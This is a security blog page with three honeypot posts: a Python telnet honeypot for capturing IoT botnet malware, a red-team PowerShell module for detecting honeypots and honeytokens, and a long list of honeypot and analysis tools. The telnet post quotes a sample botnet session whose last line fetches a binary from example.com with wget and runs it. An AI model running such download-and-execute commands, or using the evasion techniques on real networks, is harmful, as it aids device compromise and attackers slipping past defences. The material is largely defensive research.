Security of Information, Threat Intelligence, Hacking, Offensive Security, Pentest, Open Source, Hackers Tools, Leaks, Pr1v8, Premium Courses Free, etc

  • Penetration Testing Distribution - BackBox

    BackBox is a penetration test and security assessment oriented Ubuntu-based Linux distribution providing a network and informatic systems analysis toolkit. It includes a complete set of tools required for ethical hacking and security testing...
  • Pentest Distro Linux - Weakerth4n

    Weakerth4n is a penetration testing distribution which is built from Debian Squeeze.For the desktop environment it uses Fluxbox...
  • The Amnesic Incognito Live System - Tails

    Tails is a live system that aims to preserve your privacy and anonymity. It helps you to use the Internet anonymously and circumvent censorship...
  • Penetration Testing Distribution - BlackArch

    BlackArch is a penetration testing distribution based on Arch Linux that provides a large amount of cyber security tools. It is an open-source distro created specially for penetration testers and security researchers...
  • The Best Penetration Testing Distribution - Kali Linux

    Kali Linux is a Debian-based distribution for digital forensics and penetration testing, developed and maintained by Offensive Security. Mati Aharoni and Devon Kearns rewrote BackTrack...
  • Friendly OS designed for Pentesting - ParrotOS

    Parrot Security OS is a cloud friendly operating system designed for Pentesting, Computer Forensic, Reverse engineering, Hacking, Cloud pentesting...
Showing posts with label Honeypots. Show all posts
Showing posts with label Honeypots. Show all posts

Sunday, December 31, 2017

Python Telnet Honeypot For Catching Botnet Binaries - Telnet IoT Honeypot


This project implements a python telnet server trying to act as a honeypot for IoT Malware which spreads over horribly insecure default passwords on telnet servers on the internet.
Other than https://github.com/stamparm/hontel or https://github.com/micheloosterhof/cowrie (examples), which provides full (via chroot) or simulated behaviour of a linux system this honeypots goal is just to collect statistics of (IoT) botnets. This means that the honeypot must be made to work with every form of automated telnet session, which may try to infect the honeypot with malware. Luckily, these malwares infection processes are quite simple, just using wget do download something and running it.

Architekure
The application has a client/server architekture, with a client (the actual honeypot) accepting telnet connections and a server aggregating connection data and sample analysis.
However, for local deployments, the application can also be run in local mode to eliminate the need to run a client and server locally.

Running
The application has a config file named config.py. Samples are included for local and client/server deployments.

Client/Local Mode
python honey.py

Server
python backend.py

Opening the frontend
After the server is started, open html/index.html in your favorite browser. For this to work, the url in html/apiurl.js should point to your running backend, which it should do automatically for local deployments.

Sample Connection
enable
shell
sh
cat /proc/mounts; /bin/busybox PEGOK
cd /tmp; (cat .s || cp /bin/echo .s); /bin/busybox PEGOK
nc; wget; /bin/busybox PEGOK
(dd bs=52 count=1 if=.s || cat .s)
/bin/busybox PEGOK
rm .s; wget http://example.com:4636/.i; chmod +x .i; ./.i; exit 

Images


Share:

Thursday, September 21, 2017

Microsoft PowerShell Module to Find HoneyPots and HoneyTokens in the Network - HoneypotBuster


Microsoft PowerShell module designed for red teams that can be used to find honeypots and honeytokens in the network or at the host.

CodeExecution
Execute code on a target machine using Import-Module.

Invoke-HoneypotBuster
HoneypotBuster is a tool designed to spot Honey Tokens, Honey Bread Crumbs, and Honey Pots used by common Distributed Deception vendors. This tool will help spot the following deception techniques:

1. Kerberoasting Service Accounts Honey Tokens

Just like the one described in the ADSecurity article by Sean Metcalf, this tricks attackers to scan for Domain Users with assigned SPN (Service Principal Name) and {adminCount = 1} LDAP Attribute flag. So when you try to request TGS for that user, you’ll be exposed as Kerberoasting attempt. TGS definition: A ticket granting server (TGS) is a logical key distribution center (KDC) component that is used by the Kerberos protocol as a trusted third party.

2. Fake Computer Accounts Honey Pots

Creating many domain computer objects with no actual devices associated to them will result in confusion to any attacker trying to study the network. Any attempt to perform lateral movement into these fake objects will lead to exposure of the attacker.

3. Fake Credentials Manager Credentials Breadcrumbs

Many deception vendors are injecting fake credentials into the “Credentials Manager”. These credentials will also be revealed using tools such as Mimikatz. Although they aren’t real, attackers might confuse them as authentic credentials and use them.

4. Fake Domain Admins Accounts Honey Tokens

Creating several domain admins and their credentials who have never been active is bad policy. These Honey Tokens lure attackers to try brute-forcing domain admin credentials. Once someone tries to authenticate to this user, an alarm will be triggered, and the attacker will be revealed. Microsoft ATA uses this method.

5. Fake Mapped Drives Breadcrumbs

Many malicious automated scripts and worms are spreading via SMB Shares, especially if they’re mapped as Network Drive Share. This tool will try to correlate some of the data collected before to identify any mapped drive related to a specific Honey Pot server.

6. DNS Records Manipulation HoneyPots

One of the methods deception vendors use to detect fake endpoints is registering their DNS records towards the Honey Pot Server. They will then be able to point the attacker directly to their honey pot instead of actual endpoints.


Usage

To install any of these modules, drop the PowerShell scripts into a directory and type
Import-Module PathTo\scriptName.ps1

Then run the Module from the Powershell.
Refer to the comment-based help in each individual script for detailed usage information.


Share:

Wednesday, January 6, 2016

Collection Of Awesome Honeypots



A curated list of awesome honeypots, tools, components and much more. The list is divided into categories such as web, services, and others, focusing on open source projects.

Honeypots

  • Database Honeypots
  • Web honeypots
  • Service Honeypots
    • Kippo - Medium interaction SSH honeypot
    • honeyntp - NTP logger/honeypot
    • honeypot-camera - observation camera honeypot
    • troje - a honeypot built around lxc containers. It will run each connection with the service within a seperate lxc container.
    • slipm-honeypot - A simple low-interaction port monitoring honeypot
    • HoneyPy - A low interaction honeypot
    • Ensnare - Easy to deploy Ruby honeypot
    • RDPy - A Microsoft Remote Desktop Protocol (RDP) honeypot in python
  • Anti-honeypot stuff
    • kippo_detect - This is not a honeypot, but it detects kippo. (This guy has lots of more interesting stuff)
  • ICS/SCADA honeypots
    • Conpot - ICS/SCADA honeypot
    • scada-honeynet - mimics many of the services from a popular PLC and better helps SCADA researchers understand potential risks of exposed control system devices
    • SCADA honeynet - Building Honeypots for Industrial Networks
  • Deployment
  • Data Analysis
    • Kippo-Graph - a full featured script to visualize statistics from a Kippo SSH honeypot
    • Kippo stats - Mojolicious app to display statistics for your kippo SSH honeypot
  • Other/random
    • NOVA uses honeypots as detectors, looks like a complete system.
    • Open Canary - A low interaction honeypot intended to be run on internal networks.
    • libemu - Shellcode emulation library, useful for shellcode detection.
  • Open Relay Spam Honeypot
  • Botnet C2 monitor
    • Hale - Botnet command & control monitor
  • IPv6 attack detection tool
    • ipv6-attack-detector - Google Summer of Code 2012 project, supported by The Honeynet Project organization
  • Research Paper
    • vEYE - behavioral footprinting for self-propagating worm detection and profiling
  • Honeynet statistics
    • HoneyStats - A statistical view of the recorded activity on a Honeynet
  • Dynamic code instrumentation toolkit
    • Frida - Inject JavaScript to explore native apps on Windows, Mac, Linux, iOS and Android
  • Front-end for dionaea
    • DionaeaFR - Front Web to Dionaea low-interaction honeypot
  • Tool to convert website to server honeypots
    • HIHAT - ransform arbitrary PHP applications into web-based high-interaction Honeypots
  • Malware collector
    • Kippo-Malware - Python script that will download all malicious files stored as URLs in a Kippo SSH honeypot database
  • Sebek in QEMU
    • Qebek - QEMU based Sebek. As Sebek, it is data capture tool for high interaction honeypot
  • Malware Simulator
    • imalse - Integrated MALware Simulator and Emulator
  • Distributed sensor deployment
    • Smarthoneypot - custom honeypot intelligence system that is simple to deploy and easy to manage
    • Modern Honey Network - Multi-snort and honeypot sensor management, uses a network of VMs, small footprint SNORT installations, stealthy dionaeas, and a centralized server for management
    • ADHD - Active Defense Harbinger Distribution (ADHD) is a Linux distro based on Ubuntu LTS. It comes with many tools aimed at active defense preinstalled and configured
  • Network Analysis Tool
  • Log anonymizer
    • LogAnon - log anonymization library that helps having anonymous logs consistent between logs and network captures
  • server
    • Honeysink - open source network sinkhole that provides a mechanism for detection and prevention of malicious traffic on a given network
  • Botnet traffic detection
    • dnsMole - analyse dns traffic, and to potentionaly detect botnet C&C server and infected hosts
  • Low interaction honeypot (router back door)
  • honeynet farm traffic redirector
    • Honeymole - eploy multiple sensors that redirect traffic to a centralized collection of honeypots
  • HTTPS Proxy
    • mitmproxy - allows traffic flows to be intercepted, inspected, modified and replayed
  • spamtrap
  • System instrumentation
    • Sysdig - open source, system-level exploration: capture system state and activity from a running Linux instance, then save, filter and analyze
  • Honeypot for USB-spreading malware
    • Ghost-usb - honeypot for malware that propagates via USB storage devices
  • Data Collection
    • Kippo2MySQL - extracts some very basic stats from Kippo’s text-based log files (a mess to analyze!) and inserts them in a MySQL database
    • Kippo2ElasticSearch - Python script to transfer data from a Kippo SSH honeypot MySQL database to an ElasticSearch instance (server or cluster)
  • Passive network audit framework parser
    • pnaf - Passive Network Audit Framework
  • VM Introspection
    • VIX virtual machine introspection toolkit - VMI toolkit for Xen, called Virtual Introspection for Xen (VIX)
    • vmscope - Monitoring of VM-based High-Interaction Honeypots
    • vmitools - C library with Python bindings that makes it easy to monitor the low-level details of a running virtual machine
  • Binary debugger
  • Mobile Analysis Tool
    • APKinspector - APKinspector is a powerful GUI tool for analysts to analyze the Android applications
    • Androguard - Reverse engineering, Malware and goodware analysis of Android applications ... and more
  • Low interaction honeypot
    • Honeypoint - platform of distributed honeypot technologies
    • Honeyperl - Honeypot software based in Perl with plugins developed for many functions like : wingates, telnet, squid, smtp, etc
  • Honeynet data fusion
    • HFlow2 - data coalesing tool for honeynet/network analysis
  • Server
    • LaBrea - takes over unused IP addresses, and creates virtual servers that are attractive to worms, hackers, and other denizens of the Internet.
    • Kippo - SSH honeypot
    • KFSensor - Windows based honeypot Intrusion Detection System (IDS)
    • Honeyd Also see more honeyd tools
    • Glastopf - Honeypot which emulates thousands of vulnerabilities to gather data from attacks targeting web applications
    • DNS Honeypot - Simple UDP honeypot scripts
    • Conpot - ow interactive server side Industrial Control Systems honeypot
    • Bifrozt - High interaction honeypot solution for Linux based systems
    • Beeswarm - Honeypot deployment made easy
    • Bait and Switch - redirects all hostile traffic to a honeypot that is partially mirroring your production system
    • Artillery - open-source blue team tool designed to protect Linux and Windows operating systems through multiple methods
    • Amun - vulnerability emulation honeypot
  • VM cloaking script
    • Antivmdetect - Script to create templates to use with VirtualBox to make vm detection harder
  • IDS signature generation
  • lookup service for AS-numbers and prefixes
  • Web interface (for Thug)
    • Rumal - Thug's Rumāl: a Thug's dress & weapon
  • Data Collection / Data Sharing
    • HPfriends - data-sharing platform
    • HPFeeds - lightweight authenticated publish-subscribe protocol
  • Distributed spam tracking
  • Python bindings for libemu
  • Controlled-relay spam honeypot
  • Visualization Tool
  • central management tool
  • Network connection analyzer
  • Virtual Machine Cloaking
  • Honeypot deployment
  • Automated malware analysis system
  • Low interaction
  • Low interaction honeypot on USB stick
  • Honeypot extensions to Wireshark
  • Data Analysis Tool
  • Telephony honeypot
  • Client
  • Visual analysis for network traffic
  • Binary Management and Analysis Framework
  • Honeypot
  • PDF document inspector
  • Distribution system
  • HoneyClient Management
  • Network Analysis
  • Hybrid low/high interaction honeypot
  • Sebek on Xen
  • SSH Honeypot
  • Glastopf data analysis
  • Distributed sensor project
  • a pcap analyzer
  • Client Web crawler
  • network traffic redirector
  • Honeypot Distribution with mixed content
  • Honeypot sensor
  • File carving
  • File and Network Threat Intelligence
  • data capture
  • SSH proxy
  • Anti-Cheat
  • behavioral analysis tool for win32
  • Live CD
  • Spamtrap
  • Commercial honeynet
  • Server (Bluetooth)
  • Dynamic analysis of Android apps
  • Dockerized Low Interaction packaging
  • Network analysis
  • Sebek data visualization
  • SIP Server
  • Botnet C2 monitoring
  • low interaction
  • Malware collection

Honeyd Tools

Network and Artifact Analysis

  • Sandbox
  • Sandbox-as-a-Service
    • malwr.com - free malware analysis service and community
    • detux.org - Multiplatform Linux Sandbox
    • Joebox Cloud - analyzes the behavior of malicious files including PEs, PDFs, DOCs, PPTs, XLSs, APKs, URLs and MachOs on Windows, Android and Mac OS X for suspicious activities

Data Tools

  • Front Ends
    • Tango - Honeypot Intelligence with Splunk
    • Django-kippo - Django App for kippo SSH Honeypot
    • Wordpot-Frontend - a full featured script to visualize statistics from a Wordpot honeypot -Shockpot-Frontend - a full featured script to visualize statistics from a Shockpot honeypot
  • Visualization
    • HoneyMap - Real-time websocket stream of GPS events on a fancy SVG world map
    • HoneyMalt - Maltego tranforms for mapping Honeypot systems

Share:
Copyright © Offensive Sec Blog | Powered by OffensiveSec
Design by OffSec | Theme by Nasa Records | Distributed By Pirate Edition